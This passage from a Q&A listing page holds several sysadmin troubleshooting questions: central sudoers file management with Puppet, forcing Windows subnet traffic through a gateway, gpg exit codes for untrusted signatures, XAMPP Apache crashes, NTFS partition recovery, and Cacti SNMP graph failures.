not concatenate a bunch of files from a folder located on a puppet client in case someone puts a file in there (maliciously or not) and either breaks the combined file or inserts something in it. Most importantly, for usability, we'd like to keep the number of sudoers related files (fragment or complete) on puppet server to either 3 (prod/stage/test) or preferably 1 file. this file would (somehow) generate sudoers files on the puppet server and send one customized file to each puppet client. The purpose of this would be only searching for a username in a single file and removing it quicker than doing it on 11 files. When adding a user to a bunch of environments, it won't be as quick, but only one file would need to be opened and looked at, greatly reducing the chances of an omission. our Sudo version is 1.6.9p8 so we can't use /sudoers.d folder, only a sudoers file.

    Read the article

  • Force Windows Local Subnet Traffic through a Gateway

    - by Beerey
    Hi all, We are attempting to route all traffic from a certain machine to a gateway. This works ok for traffic destined for subnets outside of the machine's subnet. However, traffic to machines in the same subnet as the source machine goes through an On-Link gateway in Windows. This means that the default gateway is ignored, and traffic in a subnet (for example, 192.168.50.10 - 192.168.50.11) flows. Destination Netmask Gateway Interface Metric 192.168.50.0 255.255.255.0 On-link 192.168.50.214 276 This route can be deleted from Windows, but when the machine is rebooted it always comes back. Adding a persistant static route to the gateway with a lower metric doesn't work, since it will still try the On-Link gateway after the persistant route fails. Adding each machine in a VLAN isn't an option due to the setup we have Adding a startup script to delete the gateway isn't a great option either, since users will have full admin access to the machine and might disable the script. We cannot transperantly intercept all network traffic on the subnet using Gratuitous ARPs or transparent proxying, since there are other machines on the subnet which use a different gateway The only way we have gotten it to work is by adding a persistant route to the gateway for the subnet traffic, and deleting the On-link route on reboot. The question is then. Is there a way to permanently remove this On-link route If not, is there a way to otherwise force even local subnet traffic to go through a gateway?

    Read the article

  • Validating signature trust with gpg?

    - by larsks
    We would like to use gpg signatures to verify some aspects of our system configuration management tools. Additionally, we would like to use a "trust" model where individual sysadmin keys are signed with a master signing key, and then our systems trust that master key (and use the "web of trust" to validate signatures by our sysadmins). This gives us a lot of flexibility, such as the ability to easily revoke the trust on a key when someone leaves, but we've run into a problem. While the gpg command will tell you if a key is untrusted, it doesn't appear to return an exit code indicating this fact. For example: # gpg -v < foo.asc Version: GnuPG v1.4.11 (GNU/Linux) gpg: armor header: gpg: original file name='' this is a test gpg: Signature made Fri 22 Jul 2011 11:34:02 AM EDT using RSA key ID ABCD00B0 gpg: using PGP trust model gpg: Good signature from "Testing Key <[email protected]>" gpg: WARNING: This key is not certified with a trusted signature! gpg: There is no indication that the signature belongs to the owner. Primary key fingerprint: ABCD 1234 0527 9D0C 3C4A CAFE BABE DEAD BEEF 00B0 gpg: binary signature, digest algorithm SHA1 The part we care about is this: gpg: WARNING: This key is not certified with a trusted signature! gpg: There is no indication that the signature belongs to the owner. The exit code returned by gpg in this case is 0, despite the trust failure: # echo $? 0 How do we get gpg to fail in the event that something is signed with an untrusted signature? I've seen some suggestions that the gpgv command will return a proper exit code, but unfortunately gpgv doesn't know how to fetch keys from keyservers. I guess we can parse the status output (using --status-fd) from gpg, but is there a better way?

    Read the article

  • XAMPP - Apache service stops running after few seconds.

    - by Fábio Antunes
    Hello I have this big problem with my Xampp server, for some reason the Apache service stops running after a few seconds it as been started, and i have no idea what the problem is, and the error logs don't say much about the problem. [Fri May 07 01:09:32 2010] [notice] Digest: generating secret for digest authentication ... [Fri May 07 01:09:32 2010] [notice] Digest: done [Fri May 07 01:09:33 2010] [notice] Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1 configured -- resuming normal operations [Fri May 07 01:09:33 2010] [notice] Server built: Nov 11 2009 14:29:03 [Fri May 07 01:09:33 2010] [crit] (22)Invalid argument: Parent: Failed to create the child process. [Fri May 07 01:09:33 2010] [crit] (OS 6)O identificador é inválido. : master_main: create child process failed. Exiting. [Fri May 07 01:09:33 2010] [notice] Parent: Forcing termination of child process 36 identificador é inválido (pt_PT) = identifier is invalid. Note: No other applications is using the Apache port. I have done some changes to the httpd.conf file but, it as worked well for allot of time. Added some virtual hosts. Enabled xdebug. As this happen to anyone, that could tell me whats the problem? Thanks for your time.

    Read the article

  • unreadable corrupted ntfs partition - lost clusters reported

    - by Eduardo Martinez
    partition magic is reporting multiple 'bad file record signature' and 'lost clusters' errors on my 250GB samsung sata disk (connected via usb on a xp sp3). Unfortunately PM is unable to fix. PM shows the drive as being NTFS, detects used space ok and also drive name. But PM browser (right click on partition, browse...) won't show anything (as if disk was empty) Windows Explorer is not even picking the drive name and reports 'the file or directory is corrupted and unreadable' PTDD partition table doctor demo tells me the boot sector is fine, and I can see all disk content on its browser - but crucially cannot copy that content over to a new disk (PTDD browser is pretty arid to say the least) Also tried - photorec-6.11.3 - it actually started to extract files but wouldn't keep file names or any folder structure (maybe I missed sth on the configuration options) - find and mount - intellectual scan went well, the only partition on the disk was detected, then tried to mount into p: but got this error on windows explorer: 'p:\ is not accesible. The media is write protected'. Find and mount allows you to create an image from partition but I don't have a disk big enough at hand. Does anyone know if this will keep the extracted files/folders structure intact? I'm starting to think the disk is pretty screwed and my chances to recover this data are slim. Please someone enlighten me with that marvellous piece of software I am missing :-) Thanks in advance

    Read the article

  • Cacti not working for SNMP data sources

    - by lorenzo-s
    I installed packages cacti and snmpd on a Debian server. I'm able to display common graphs in Cacti (such as memory usage, load average, logged in users, etc) using the data templates listed as Unix. Now I want to replace these graphs with new ones using SNMP data sources, because I see there is also CPU usage and because it's not excluded I have to manage multiple hosts in the future. So, I installed snmpd on the machine and left the snmpd.conf as it is. In Cacti, I created three new data sources from SNMP templates for 127.0.0.1 host: ucd/net - CPU Usage - Nice ucd/net - CPU Usage - System ucd/net - CPU Usage - User Then I created a new graph from template ucd/net - CPU Usage, and select the three data sources in the Graph Item Fields section. Graph is now enabled and running, but empty. No data have been collected. Under Console - Devices my SNMP host is listed as up and running: System:Linux ip-xx-xx-xxx-xxx 3.2.0-23-virtual #36-Ubuntu SMP Tue Apr 10 22:29:03 UTC 2012 x86_64 Uptime: 929267 (0 days, 2 hours, 34 minutes) Hostname: ip-xx-xx-xxx-xxx Location: Sitting on the Dock of the Bay Contact: Me [email protected] In SNMP Options I left all as it is: SNMP Version: Version 1 SNMP Community: public SNMP Timeout: 500 ms Maximum OID's Per Get Request: 10 In Console - Utilities - Cacti Log I have multiple warning (two for each data source) every 5 minutes: 10/29/2012 01:45:01 PM - CMDPHP: Poller[0] Host[2] DS[18] WARNING: Result from SNMP not valid. Partial Result: U 10/29/2012 01:45:01 PM - CMDPHP: Poller[0] WARNING: SNMP Get Timeout for Host:'127.0.0.1', and OID:'.1.3.6.1.4.1.2021.4.15.0' 10/29/2012 01:45:01 PM - CMDPHP: Poller[0] Host[1] DS[9] WARNING: Result from SNMP not valid. Partial Result: U 10/29/2012 01:45:01 PM - CMDPHP: Poller[0] WARNING: SNMP Get Timeout for Host:'127.0.0.1', and OID:'.1.3.6.1.4.1.2021.11.52.0' 10/29/2012 01:40:01 PM - CMDPHP: Poller[0] Host[2] DS[19] WARNING: Result from SNMP not valid. Partial Result: U 10/29/2012 01:40:01 PM - CMDPHP: Poller[0] WARNING: SNMP Get Timeout for Host:'127.0.0.1', and OID:'.1.3.6.1.4.1.2021.4.6.0' [...] I have the feeling I'm missing something, but I cannot get it...

    Read the article

< Previous Page | 761 762 763 764 765 766 767 768 769 770 771 772  | Next Page >